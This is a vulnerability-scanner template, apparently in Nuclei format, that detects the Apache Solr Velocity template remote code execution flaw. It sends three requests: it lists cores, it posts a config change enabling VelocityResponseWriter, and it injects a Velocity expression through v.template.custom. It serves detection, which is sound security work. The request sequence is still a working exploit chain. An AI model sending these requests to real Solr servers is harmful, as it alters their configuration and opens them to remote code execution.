id: poc-yaml-solr-velocity-template-rce

info:
  name: poc-yaml-solr-velocity-template-rce
  author: Loneyer
  severity: medium
  tags: xray-converted,rce,ct-158302
  reference:
    - https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt
    - https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "responseHeader"
  - raw:
      - |
        POST /solr/{{core}}/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
        "update-queryresponsewriter": {
        "startup": "test",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
        }
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{{rand_int(1000, 9999)}}%20*%20{{rand_int(1000, 9999)}})%24c HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200